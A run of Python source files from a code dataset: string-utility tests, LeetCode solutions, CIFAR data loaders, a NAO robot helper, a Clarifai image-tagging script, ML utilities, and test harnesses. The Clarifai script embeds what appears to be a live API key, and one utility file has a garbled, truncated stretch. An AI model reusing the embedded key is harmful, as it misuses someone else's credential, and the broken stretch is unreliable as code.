useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# by sx.slex@gmail.com\n\nimport unittest\nfrom sxtools import string_utils\n\n\nclass TestStringUtils(unittest.TestCase):\n\n def test_capitalize_name_1(self):\n self.assertEqual(\n string_utils.capitalize_name(u'BRASÍLIA'),\n u'Brasília'\n )\n\n def test_capitalize_name_2(self):\n self.assertEqual(\n string_utils.capitalize_name(u'BRASÍLIA/PLANO PILOTO'),\n u'Brasília/Plano Piloto'\n )\n\n def test_capitalize_name_3(self):\n self.assertEqual(\n string_utils.capitalize_name(u'joão paulo ii'),\n u'João Paulo II'\n )\n\n def test_capitalize_name_4(self):\n self.assertEqual(\n string_utils.capitalize_name(''),\n u''\n )\n\n def test_to_unicode_str(self):\n self.assertEqual(\n string_utils.to_unicode('BRASILIA/PLANO PILOTO'),\n u'BRASILIA/PLANO PILOTO'\n )\n\n def test_to_unicode_list(self):\n self.assertListEqual(\n string_utils.to_unicode(\n ['BRASILIA/PLANO PILOTO', 1, True, 'Bolas']\n ),\n [u'BRASILIA/PLANO PILOTO', 1, True, u'Bolas']\n )\n\n def test_to_unicode_dict(self):\n self.assertDictEqual(\n string_utils.to_unicode(\n dict(name='BRASILIA/PLANO PILOTO', idade=1, sport='Tenis')\n ),\n dict(name=u'BRASILIA/PLANO PILOTO', idade=1, sport=u'Tenis')\n )\n\n def test_to_unicode_latin(self):\n self.assertEquals(\n string_utils.to_unicode(\n 'Ol\\xe1'\n ),\n u'Olá'\n )\n","sub_path":"tests/test_string_utils.py","file_name":"test_string_utils.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"10798200","text":"__author__ = 'jayvee'\n\n\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n first_row_has_zero = not all(matrix[0])\n first_col_has_zero = not all([matrix[i][0] for i in range(len(matrix))])\n for i in xrange(1, len(matrix)):\n for j in xrange(1, len(matrix[0])):\n if matrix[i][j] == 0:\n matrix[0][j] = 0\n matrix[i][0] = 0\n # set values\n for i in xrange(1, len(matrix)):\n for j in xrange(1, 
len(matrix[0])):\n                if matrix[0][j] == 0 or matrix[i][0] == 0:\n                    matrix[i][j] = 0\n        if first_row_has_zero:\n            matrix[0] = [0] * len(matrix[0])\n        if first_col_has_zero:\n            for i in xrange(0, len(matrix)):\n                matrix[i][0] = 0\n","sub_path":"python/Set Matrix Zeroes.py","file_name":"Set Matrix Zeroes.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"137358724","text":"#51. N-Queens\r\n# Time Complexity : O(n!)\r\n# Space Complexity : O(n x n) \r\n# Did this code successfully run on Leetcode : Yes\r\n# Any problem you faced while coding this : No\r\nfrom typing import List\r\n\r\nclass Solution:\r\n    result = None\r\n    board = None \r\n    def solveNQueens(self, n: int) -> List[List[str]]:\r\n        if not n :\r\n            return []\r\n        self.result = []\r\n        self.m = n\r\n        self.board = [[0 for _ in range(n)] for _ in range(n)]\r\n        self.backtrack(0)\r\n        return self.result\r\n    def backtrack(self,indx):\r\n        #base\r\n        if indx == len(self.board):\r\n            li = []\r\n            for i in range(len(self.board)):\r\n                st = ''\r\n                for j in range(len(self.board[0])):\r\n                    if self.board[i][j] == 0:\r\n                        st += '.'\r\n                    else:\r\n                        st += 'Q'\r\n                li.append(st)\r\n            self.result.append(li)\r\n            return  # fixed: stop once a full board is recorded instead of falling through\r\n        #logic\r\n        for i in range(len(self.board[0])):\r\n            if self.isSafe(indx,i):\r\n                #action\r\n                self.board[indx][i] = 1\r\n                #recurse\r\n                self.backtrack(indx+1)\r\n                self.board[indx][i] = 0\r\n        \r\n        \r\n    def isSafe(self,r,c):\r\n        #above col\r\n        for i in range(len(self.board)):\r\n            if self.board[i][c] == 1:\r\n                return False\r\n        #diag left\r\n        i = r - 1\r\n        j = c - 1\r\n        while i >= 0 and j >= 0:\r\n            if self.board[i][j] == 1:\r\n                return False\r\n            i -= 1\r\n            j -= 1\r\n        \r\n        \r\n        #diag right\r\n        i = r-1\r\n        j = c+1\r\n        while i >= 0 and j < len(self.board[0]):\r\n            if self.board[i][j] == 1:\r\n                return False\r\n            i -= 1\r\n            j += 1\r\n        return True","sub_path":"solveNQueens.py","file_name":"solveNQueens.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"631944579","text":"# import apex.amp as amp\nimport torch\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport numpy as np\n\ncifar10_mu_tup = (0.4914, 0.4822, 0.4465)\ncifar10_std_tup = (0.2471, 0.2435, 0.2616)\ncifar10_mu = torch.tensor(cifar10_mu_tup).view(3,1,1).cuda()\ncifar10_std = torch.tensor(cifar10_std_tup).view(3,1,1).cuda()\ncifar10_upper_limit = ((1 - cifar10_mu)/ cifar10_std)\ncifar10_lower_limit = ((0 - cifar10_mu)/ cifar10_std)\n\ncifar100_mu_tup = (0.507, 0.487, 0.441) \ncifar100_std_tup = (0.267, 0.256, 0.276)\ncifar100_mu = torch.tensor(cifar100_mu_tup).view(3,1,1).cuda()\ncifar100_std = torch.tensor(cifar100_std_tup).view(3,1,1).cuda()\ncifar100_upper_limit = ((1 - cifar100_mu)/ cifar100_std)\ncifar100_lower_limit = ((0 - cifar100_mu)/ cifar100_std)\n\ndef clamp(X, lower_limit, upper_limit):\n    return torch.max(torch.min(X, upper_limit), lower_limit)\n
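\n# Usage sketch (an assumed adversarial-training use, not part of the original file):\n# keep a perturbed batch X + delta inside the valid normalized-pixel box, channel-wise:\n#   delta = clamp(delta, cifar10_lower_limit - X, cifar10_upper_limit - X)\n\n\"\"\"\n    Takes in a pytorch dataset object and returns train/test datasets after transformations\n\"\"\"\ndef applyDSTrans(config):\n    train_transforms = []\n    test_transforms = []\n    \n    dataset = config[\"dataset\"]\n    if dataset == datasets.CIFAR10 or dataset==datasets.CIFAR100:\n        for elt in [transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip()]:\n            train_transforms.append(elt)\n    \n# print(dataset)\n# print(dict(dataset))\n# print(dataset==datasets.CIFAR10)\n# print(\"mean:\", cifar10_mean)\n# 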
print(\"std:\", cifar10_std)\n    \n    tens = transforms.ToTensor()\n    train_transforms.append(tens)\n    test_transforms.append(tens)\n    \n    print(cifar10_mu_tup, cifar10_std_tup)\n    \n    if dataset == datasets.CIFAR10 and config[\"training_method\"] != \"trades\" and not config.get('auto_attack', False):\n        print(\"Normalized DS\")\n        norm = transforms.Normalize(cifar10_mu_tup, cifar10_std_tup)\n        train_transforms.append(norm)\n        test_transforms.append(norm)\n\n    if dataset == datasets.CIFAR100 and config[\"training_method\"] != \"trades\" and not config.get('auto_attack', False):\n        print(\"Normalized DS\")\n        norm = transforms.Normalize(cifar100_mu_tup, cifar100_std_tup)\n        train_transforms.append(norm)\n        test_transforms.append(norm)\n    \n# assert(len(train_transforms) == 4)\n# assert(len(test_transforms) == 2)\n\n    train_ds = dataset('./data', train=True, download=True, transform=transforms.Compose(train_transforms))\n    test_ds = dataset('./data', train=False, download=True, transform=transforms.Compose(test_transforms))\n\n    return train_ds, test_ds\n\ndef dataset_with_indices(cls):\n    \"\"\"\n    Modifies the given Dataset class to return a tuple data, target, index\n    instead of just data, target.\n    \"\"\"\n\n    def __getitem__(self, index):\n        data, target = cls.__getitem__(self, index)\n        return data, target, index\n\n    return type(cls.__name__, (cls,), {\n        '__getitem__': __getitem__,\n    })\n\ndef get_loaders(dir_, batch_size):\n    # fixed: this module defines cifar10_mu_tup/cifar10_std_tup; the names\n    # cifar10_mean/cifar10_std used here originally were undefined\n    train_transform = transforms.Compose([\n        transforms.RandomCrop(32, padding=4),\n        transforms.RandomHorizontalFlip(),\n        transforms.ToTensor(),\n        transforms.Normalize(cifar10_mu_tup, cifar10_std_tup),\n    ])\n    test_transform = transforms.Compose([\n        transforms.ToTensor(),\n        transforms.Normalize(cifar10_mu_tup, cifar10_std_tup),\n    ])\n    num_workers = 2\n    train_dataset = datasets.CIFAR10(\n        dir_, train=True, transform=train_transform, download=True)\n    test_dataset = datasets.CIFAR10(\n        dir_, train=False, transform=test_transform, download=True)\n    train_loader = torch.utils.data.DataLoader(\n        dataset=train_dataset,\n        batch_size=batch_size,\n        shuffle=True,\n        pin_memory=True,\n        num_workers=num_workers,\n    )\n    test_loader = torch.utils.data.DataLoader(\n        dataset=test_dataset,\n        batch_size=batch_size,\n        shuffle=False,\n        pin_memory=True,\n        num_workers=2,\n    )\n    return train_loader, test_loader\n\nclass SnapshotEnsembleScheduler:\n    def __init__(self, opt, T, M, a0):\n        self.opt = opt\n        self.T = T\n        self.M = M\n        self.t = 0\n        self.lastLR = a0\n        self.a0 = a0\n\n    def step(self):\n        self.t+=1\n        newLR = self.a0/2*(np.cos((np.pi*((self.t - 1) % np.ceil(self.T/self.M)))/ np.ceil(self.T/self.M)) + 1)\n\n        for g in self.opt.param_groups:\n            g['lr'] = newLR\n\n        self.lastLR = newLR\n\n\n    def get_last_lr(self):\n        return [self.lastLR]\n\n    def snapshot(self):\n        return self.t % np.ceil(self.T/self.M) == 0
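\n\n# Usage sketch (a hypothetical training loop, not part of the original file):\n# the learning rate is cosine-annealed in M cycles of T/M steps, and snapshot()\n# is True at the end of each cycle.\n# opt = torch.optim.SGD(model.parameters(), lr=0.1)\n# sched = SnapshotEnsembleScheduler(opt, T=50000, M=5, a0=0.1)\n# for step in range(50000):\n#     train_one_batch(...)\n#     sched.step()\n#     if sched.snapshot():\n#         torch.save(model.state_dict(), 'snapshot_%d.pt' % step)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"312529537","text":"'''\nCreated on Feb 10, 2013\n\n@author: dsnowdon\n\nCode that has dependencies on the NAOqi framework\n'''\n\nfrom naoqi import ALProxy\n\n'''\nHold information about the NAO environment and provide abstraction for logging\n'''\nclass NaoEnvironment(object):\n    def __init__(self, box_, memory_, motion_, tts_):\n        super(NaoEnvironment, self).__init__()\n        self.box = box_\n        self.memory = memory_\n        self.motion = motion_\n        self.tts = tts_\n    \n    def log(self, msg):\n        self.box.log(msg)\n\n'''\nCreate environment object.\nNeeds to be called 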
from a process with an ALBroker running (for example\nwithin Choregraphe code)\n'''\ndef make_environment(box_):\n    return NaoEnvironment(box_,\n                          ALProxy(\"ALMemory\"), \n                          ALProxy(\"ALMotion\"), \n                          ALProxy(\"ALTextToSpeech\"))","sub_path":"wanderer/src/main/python/util/naoutil.py","file_name":"naoutil.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"215430431","text":"from clarifai.rest import ClarifaiApp\nimport pandas as pd\nimport numpy as np\n\n# Global Variables\n# 10: ten folder\ntotal_photos_num_10 = 10\nimage_folder_path_10 = \"../static/images/ten/\"\nall_tags_filename_10 = \"../database_10.txt\"\n\n# 200: two hundred folder\ntotal_photos_num_200 = 200\nimage_folder_path_200 = \"../static/images/two_hundred/\"\nall_tags_filename_200 = \"../database_200.txt\"\n\nall_tags = []\n\n# Create clarifai model instance\napp = ClarifaiApp(api_key='1fc0e40ef28b4e3085522ee5857b1aee')\nmodel = app.public_models.general_model\n\ndef read_all_tags_and_save_as_local_file(total_photos_num, image_folder_path, model, all_tags_filename):\n    \"\"\"\n    iterate image folder, read images one by one and build all_tags[]\n    :param image_folder_path: folder path for images\n    :param model: Clarifai model instance\n    :return: void\n    \"\"\"\n    for i in range(total_photos_num):\n        print(\"Indexing photo number: # \", i)\n        filename = image_folder_path + str(i) + '.jpg'\n        response = model.predict_by_filename(filename=filename)\n        concepts = response['outputs'][0]['data']['concepts']\n        for concept in concepts:\n            if concept['name'] not in all_tags:\n                all_tags.append(concept['name'])\n    # return all_tags\n    # Save all_tags to local file\n    print(\"new built all_tags[] length is:\", len(all_tags))\n    with open(all_tags_filename, \"w\") as file:\n        file.write(str(all_tags))\n\nread_all_tags_and_save_as_local_file(total_photos_num=total_photos_num_200, image_folder_path=image_folder_path_200, model=model, all_tags_filename=all_tags_filename_200)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"build_database/build_all_tags.py","file_name":"build_all_tags.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"61465882","text":"from smac.configspace import Configuration, ConfigurationSpace\nfrom smac.configspace.util import convert_configurations_to_array\nfrom smac.optimizer.objective import average_cost\nfrom smac.runhistory.runhistory import RunHistory\nfrom smac.tae.execute_ta_run import StatusType\nimport numpy as np\nimport subprocess\nimport typing\n\n\nclass AbstractPS(object):\n    def __init__(self,\n                 ps_args: typing.List[str],\n                 cs: ConfigurationSpace,\n                 aggregate_func: callable = average_cost) -> None:\n        \"\"\"Initialize AbstractPS.\n\n        Parameters\n        ----------\n        ps_args : typing.List[str]\n            List of strings that are used to open a PS-Lite\n            server/worker/scheduler.\n        cs : ConfigurationSpace\n            ConfigurationSpace of the hyperparameters.\n        aggregate_func : callable\n            Aggregate function for RunHistory.\n        \"\"\"\n        self.ps = subprocess.Popen(ps_args, stdin=subprocess.PIPE,\n                                   stdout=subprocess.PIPE)\n        self.cs = cs\n        self.aggregate_func = aggregate_func\n\n    def push(self, **kwargs) -> None:\n        \"\"\"Push the string parsed from push_parser to the other side.\n\n        Parameters\n        ----------\n        kwargs : typing.Dict\n            Parameters of push_parser function for server/worker.\n\n        Returns\n        -------\n        \"\"\"\n        # read and write line by line, so the pipe buffer cannot blow up\n
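        # Wire-format note (see the stdin writes below): push emits one header\n        # line, \"num_lines num_config time_left\", followed by one ASCII-encoded\n        # line per config/runhistory entry.\n        time_left, lines = 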
self.push_parser(**kwargs)\n        # append \\n to each line as the line terminator\n        lines = [(line + \"\\n\").encode(\"ascii\") for line in lines]\n\n        # number of hyperparameters\n        num_config = len(self.cs.get_hyperparameters())\n        # first, write the total number of lines and the number of hyperparameters per Configuration\n        self.ps.stdin.write(\n            (str(len(lines)) + \" \" + str(num_config) + \" \" + str(\n                time_left) + \"\\n\").encode(\"ascii\"))\n        self.ps.stdin.flush()\n\n        # push the parsed content to the server/worker side\n        for line in lines:\n            # write each line to the pipe\n            self.ps.stdin.write(line)\n            self.ps.stdin.flush()\n\n    def pull(self):\n        \"\"\"Pull and parse the data from the other node.\n\n        Returns\n        -------\n        \"\"\"\n        line = \"\"\n        # skip blank lines\n        while line == \"\":\n            line = self.ps.stdout.readline().decode(\"ascii\").strip()\n        line = line.split()\n        # read the number of runhistories and the number of hyperparameters\n        num_runhistory, num_config, time_left = int(float(line[0])), int(\n            float(line[1])), float(line[2])\n        # recent change: the remaining time is read as well\n\n        # empty list that collects every ConfigHistory line\n        ret_list = []\n        while len(ret_list) < num_runhistory:\n            line = self.ps.stdout.readline().decode(\"ascii\").strip()\n            # skip blank lines\n            if line == \"\":\n                continue\n            # otherwise append the line to ret_list\n            ret_list.append(line)\n\n        # return the pulled data after parsing\n        return self.pull_parser(time_left, ret_list)\n\n    def push_parser(self, **kwargs) -> typing.Tuple[float, typing.List[str]]:\n        \"\"\"Parse the data to a string that can be passed from Python to C++\n        program.\n\n        Parameters\n        ----------\n        kwargs : typing.Dict\n            Parameters of push_parser function for server/worker.\n\n        Returns\n        -------\n        time_left : float\n            Return the time left for the procedure.\n        return : typing.List[str]\n            Return a list of string per config/runhistory on each line.\n        \"\"\"\n        # abstract hook: together with pull_parser it handles the concrete communication details\n        raise NotImplementedError\n\n    def pull_parser(self, time_left: float, data: typing.List[str]):\n        \"\"\"Parse List[str] data to their original forms.\n\n        Parameters\n        ----------\n        time_left : float\n            The time left for the smbo.\n        data : typing.List[str]\n            Data passed from the node.\n\n        Returns\n        -------\n        \"\"\"\n        raise NotImplementedError\n\n\nclass ConfigHistory(object):\n    def __init__(self,\n                 config: Configuration,\n                 cs: ConfigurationSpace,\n                 runhistory: RunHistory = None,\n                 aggregate_func: callable = average_cost):\n        \"\"\"A tuple for config and its runhistory.\n\n        Parameters\n        ----------\n        config : Configuration\n            The configuration. It may be incumbent or one of the challengers.\n        cs : ConfigurationSpace\n            ConfigSpace of the model.\n        runhistory : RunHistory, default_value = None\n            The runhistory of the config. It can be either empty or contain\n            more configurations than the given one. If runhistory is not given,\n            it is set to an empty RunHistory object.\n        aggregate_func : callable, default_value = average_cost\n            The aggregate function.\n        \"\"\"\n        self.config = config\n        self.cs = cs\n        self.aggregate_func = aggregate_func\n        # initialize the runhistory\n        self.runhistory = RunHistory(\n            aggregate_func=aggregate_func) if runhistory is None else runhistory\n\n    def to_str(self) -> str:\n        \"\"\"Convert the ConfigHistory object to a string.\n\n        Returns\n        -------\n        return : str\n            A str containing the Configuration and its related runhistories.\n            For example, \"0.8(config) 1(#runhistory) 0.6 1.2 1234\"\n        \"\"\"\n        # fetch the runhistory entries for this config\n        runhistory = self.runhistory.get_history_for_config(self.config)\n\n        # convert the config to an ndarray\n        config_list = [str(param) for param in\n                       convert_configurations_to_array([self.config])[0]]\n        # convert the runhistory to a list of strings, one \"$cost $time $seed\" per entry\n        runhistory_list = [\" \".join([str(item) for item in history]) for history\n                           in runhistory]\n\n        # join the config values, the runhistory count, and the runhistory strings\n        return \" \".join(config_list + [str(len(runhistory_list))] +\n                        runhistory_list)\n\n    @staticmethod\n    def read_str(data: str,\n                 cs: ConfigurationSpace,\n                 aggregate_func: callable = average_cost):\n        \"\"\"Read a string line and transform it to a ConfigHistory. The input\n        should be valid. For example, \"0.8(config) 1(#runhistory) 0.6 1.2 1234\"\n\n        Parameters\n        ----------\n        data : str\n            A string containing config and runhistory info.\n        cs : ConfigurationSpace\n            The ConfigurationSpace.\n        aggregate_func : callable, default = average_cost\n            The aggregate function.\n\n        Returns\n        -------\n        Return : ConfigHistory\n            Return a ConfigHistory.\n        \"\"\"\n        # split the line and read the Configuration first\n        line = data.split()\n        # number of hyperparameters, from the ConfigurationSpace\n        num_config = len(cs.get_hyperparameters())\n        config = Configuration(cs, vector=np.array(\n            [float(param) for param in line[:num_config]]))\n\n        # initialize: one RunHistory per config\n        runhistory = RunHistory(aggregate_func=aggregate_func)\n        # read the number of runhistory entries\n        num_runhistory = int(float(line[num_config]))\n        counter = num_config + 1\n        # then read each group of three numbers as one runhistory entry\n        for i in range(num_runhistory):\n            cost = float(line[counter])\n            time = float(line[counter + 1])\n            seed = int(float(line[counter + 2]))\n            counter += 3\n            # add to the runhistory\n            runhistory.add(config, cost, time, StatusType.SUCCESS, seed=seed)\n\n        # return the assembled ConfigHistory\n        config_history = ConfigHistory(config, cs, runhistory=runhistory,\n                                       aggregate_func=aggregate_func)\n        return config_history\n\n    def get_config(self) -> Configuration:\n        \"\"\"Return the Configuration of the object.\n\n        Returns\n        -------\n        config : Configuration\n        \"\"\"\n        return self.config\n\n    def get_runhistory(self) -> RunHistory:\n        \"\"\"Return the RunHistory of the object.\n\n        Returns\n        -------\n        runhistory : RunHistory\n        \"\"\"\n        return self.runhistory\n
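\n# Round-trip sketch (assuming a ConfigurationSpace cs and a populated\n# ConfigHistory ch; not part of the original file):\n# line = ch.to_str()                      # e.g. \"0.8 1 0.6 1.2 1234\"\n# ch2 = ConfigHistory.read_str(line, cs)  # rebuilds the config and runhistory\n","sub_path":"smac/pssmac/abstract_ps.py","file_name":"abstract_ps.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"88308927","text":"\"\"\"Module defining the Movie class.\"\"\"\n\nimport webbrowser\n\n\nclass Movie():\n    \"\"\"Class representing a movie object.\"\"\"\n\n    def __init__(self, title, poster_image_url, trailer_youtube_url):\n        \"\"\"\n        Create a new movie instance.\n\n        Arguments:\n        title - movie's title\n        poster_image_url - link to image that will be shown for movie\n        trailer_youtube_url - link to movie's trailer in Youtube\n\n        \"\"\"\n        self.title = title\n        self.poster_image_url = 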
poster_image_url\n        self.trailer_youtube_url = trailer_youtube_url\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"151977041","text":"\"\"\"\n================================================================\n Copyright (c) 2018, Yale University\n All Rights Reserved\n================================================================\n\n NAME : ji_utils_ml2018.py\n @DATE Created: 11/20/18 (5:19 PM)\n\t Modifications:\n\t - 11/20/18: added clustering for trades\n\n @AUTHOR : Jaime Shinsuke Ide\n jaime.ide@yale.edu\n===============================================================\n\"\"\"\n\n\n## General import\nimport sys\nimport os\nimport pandas as pd\nfrom IPython.display import display\nimport seaborn as sns\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport time\n\n## Clustering\nimport mdp\nimport difflib\nimport numpy as np\nimport sklearn.cluster\nimport distance\n\n## Preprocessing\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import QuantileTransformer\n\n## Regression\nimport statsmodels.api as sm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import GridSearchCV\nfrom pprint import pprint # print Sklearn model parameters\nimport xgboost as xgb\nimport torch\n\nclass matlablike():\n    pass\n\n############################################################################\n## Feature Engineering\n############################################################################\n\ndef run_df_normalization(df,normType='std'):\n    if normType=='std':\n        print('- All columns standardized: (x-mean)/std ...')\n        scaled_features = StandardScaler().fit_transform(df)\n        #scaled_target_values = StandardScaler().fit_transform(target_values.reshape(-1, 1)) # Not working properly...\n        df = pd.DataFrame(scaled_features, index=df.index, columns=df.columns)\n    if normType=='quant':\n        print('- All columns Quantile Normalizer(output:Gaussian) ...')\n        scaled_features = QuantileTransformer().fit_transform(df)\n        df = pd.DataFrame(scaled_features, index=df.index, columns=df.columns)\n    return df\n\ndef remove_outliers_df_up(dfx,percent,vars2rem,showplot=True):\n    df = dfx.copy()\n    print('Before:',df.shape)\n    for i in vars2rem:\n        t = np.percentile(df[i],100-percent)\n        mymax = np.max(df[i])\n        # remove\n        y2exclude = np.abs(df[i].values)>t\n        df = df.loc[~y2exclude]\n        t2add = 'excluded %d outliers (max=%2.4f)'%(y2exclude.sum(),mymax)\n        # plot\n        if showplot:\n            sns.distplot(df[i])\n            plt.plot([t, t], [0,1])\n            plt.text(t-1.1, .5,'%s%% threshold:%2.2f'%(percent,t), bbox=dict(facecolor='red', alpha=0.5))\n            plt.title('Removing outliers: '+ i +' (%s)'%(t2add))\n            plt.show()\n    print('After:',df.shape)\n    return df\n\ndef remove_outliers_df_down(dfx,percent,vars2rem,showplot=True):\n    df = dfx.copy()\n    print('Before:',df.shape)\n    for i in vars2rem:\n        t = np.percentile(df[i],percent)\n        mymin = np.min(df[i])\n        # remove\n        y2exclude = np.abs(df[i].values)<t\n        df = df.loc[~y2exclude]\n\n            # k>=0) standard clusters\n            xy = X[class_member_mask & core_samples_mask]\n            xy0 = X0[class_member_mask & core_samples_mask]\n            # plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=tuple(col),\n            #          markeredgecolor='k', 
markersize=14)\n\n if showtext:\n plt.plot(xy0[:, 0] / 3600, xy[:, 1], '.', markerfacecolor=mycolors[cont % 10],\n markeredgecolor='y', markersize=1)\n # add annotation\n # print('k:',k,xy0[:, 0]/3600, xy[:, 1])\n for cx, cy in zip(xy0[:, 0] / 3600, xy[:, 1]):\n plt.annotate(k, (cx, cy),\n horizontalalignment='center', verticalalignment='center', fontsize=20,\n color=mycolors[cont % 10])\n else:\n plt.plot(xy0[:, 0] / 3600, xy[:, 1], 'o', markerfacecolor=mycolors[cont % 10],\n markeredgecolor='k', markersize=14)\n\n # -1) noise clusters\n xy = X[class_member_mask & ~core_samples_mask]\n xy0 = X0[class_member_mask & ~core_samples_mask]\n plt.plot(xy0[:, 0] / 3600, xy[:, 1], 'o', markerfacecolor=tuple(col),\n markeredgecolor='k', markersize=6)\n\n # plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor=mycolors[cont%8],\n # markeredgecolor='k', markersize=6)\n cont += 1\n\n # plt.title('Estimated number of clusters: %d' % n_clusters_)\n plt.xlabel('time(hours)', size=20)\n plt.ylabel('orderId Group (ascII)', size=20)\n plt.title(\n '%s: %s (%d trades, %d clusters) - DBSCAN(time,orderId)' % (cccy, cdate, len(masked_time), n_clusters_),\n size=20)\n plt.show()\n\n print('******************')\n for i, j, k in zip(corderId, labels, masked_time):\n print('%s: %d (%1.1f hours)' % (i, j, k / 3600))\n print('****************** (END) ********************** \\n')\n\n return res","sub_path":"python/ji_utils_ml2019.py","file_name":"ji_utils_ml2019.py","file_ext":"py","file_size_in_byte":46736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"536354361","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"TcEx Framework LayoutJson.\"\"\"\nimport json\nimport os\nfrom collections import OrderedDict\n\n\nclass LayoutJson:\n \"\"\"Object for layout.json file.\"\"\"\n\n def __init__(self, filename=None, path=None):\n \"\"\"Initialize class properties.\"\"\"\n self.filename = filename or 'layout.json'\n if path is not None:\n self.filename = os.path.join(path, self.filename)\n\n # properties\n self._contents = None\n\n @staticmethod\n def _to_bool(value):\n \"\"\"Convert string value to bool.\"\"\"\n bool_value = False\n if str(value).lower() in ['1', 'true']:\n bool_value = True\n return bool_value\n\n @property\n def contents(self):\n \"\"\"Return layout.json contents.\"\"\"\n if self._contents is None:\n with open(self.filename, 'r') as fh:\n self._contents = json.load(fh, object_pairs_hook=OrderedDict)\n return self._contents\n\n @property\n def parameters_dict(self):\n \"\"\"Return layout.json params in a flattened dict with name param as key.\"\"\"\n parameters = {}\n for i in self.inputs:\n for p in i.get('parameters', []):\n parameters.setdefault(p.get('name'), p)\n return parameters\n\n @property\n def parameters_names(self):\n \"\"\"Return layout.json params in a flattened dict with name param as key.\"\"\"\n return self.parameters_dict.keys()\n\n @property\n def outputs_dict(self):\n \"\"\"Return layout.json outputs in a flattened dict with name param as key.\"\"\"\n outputs = {}\n for o in self.outputs:\n outputs.setdefault(o.get('name'), o)\n return outputs\n\n #\n # properties\n #\n\n @property\n def inputs(self):\n \"\"\"Return property.\"\"\"\n return self.contents.get('inputs', [])\n\n @property\n def outputs(self):\n \"\"\"Return property.\"\"\"\n return self.contents.get('outputs', 
[])\n","sub_path":"tcex/app_config_object/layout_json.py","file_name":"layout_json.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"462823814","text":"#! /usr/bin/python\n\nfrom optparse import OptionParser\n\nimport sys\nimport traceback\nimport pickle\nimport logging\nimport logging.config\n\n#fix: use agg, otherwise non-interactive machines do not work\nimport matplotlib\nmatplotlib.use('agg') \n\nfrom sim.evaluation.graph.montecarlo.MonteCarloEvaluation import *\n\nfrom sim.config import *\n\nlogging.config.fileConfig(LOGFILENAME)\nlogger = logging.getLogger(\"evrun\")\n\nclass EvaluationRunMonteCarlo:\n def __init__(self):\n logger.info(\">\"*10 + \" New Monte Carlo evaluation run \" + \"<\"*10)\n\n def execute(self,\n # ei_file,\n si_file):\n\n# ei = pickle.load(open(ei_file, 'rb'))\n si = pickle.load(open(si_file, 'rb'))\n\n logger.info(\"=\"*40)\n logger.info(\"Executing EvaluationRunMonteCarlo:\")\n logger.info(str(si))\n logger.info(\"=\"*40)\n\n mce = MonteCarloEvaluation()\n mce.execute(si, MONTE_CARLO_ITERATIONS)\n\n\nif __name__ == \"__main__\":\n try:\n optparser = OptionParser()\n\n optparser.add_option(\"-e\",\n \"--executable_info\",\n help=\"Pickled executable information filename\")\n optparser.add_option(\"-s\",\n \"--scenario_info\",\n help=\"Pickled scenario information filename\")\n\n (optionsp, argsp) = optparser.parse_args()\n\n if not (optionsp.executable_info or\n optionsp.scenario_info):\n optparser.print_help()\n sys.exit(-1)\n\n ermc = EvaluationRunMonteCarlo()\n ermc.execute(optionsp.scenario_info)\n\n except:\n logger.exception(\"Exception in EvaluationRunMonteCarlo.py\")\n","sub_path":"apps/UDPEcho/sim/run/EvaluationRunMonteCarlo.py","file_name":"EvaluationRunMonteCarlo.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"413981043","text":"__author__ = 'jiahuixing'\n#################################################\nfrom com.android.monkeyrunner import MonkeyRunner as MR\nfrom com.android.monkeyrunner import MonkeyDevice as MD\nfrom com.android.monkeyrunner import MonkeyImage as MI\n\nimport sys\nimport os\nimport random\nfrom subprocess import Popen, STDOUT\nimport time\nimport string\n#################################################\n\nclass PlayerTest:\n\n deviceID = ''\n phone = ''\n file_list = []\n device_list = []\n device = None\n easy_device = None\n package_name = 'com.miui.player'\n activity_name = 'com.miui.player/.ui.MusicBrowserActivity'\n\n edit_mode_button = {\n 'hm2':{\n 'top':{\n '0':{'x':58,'y':100,},\n 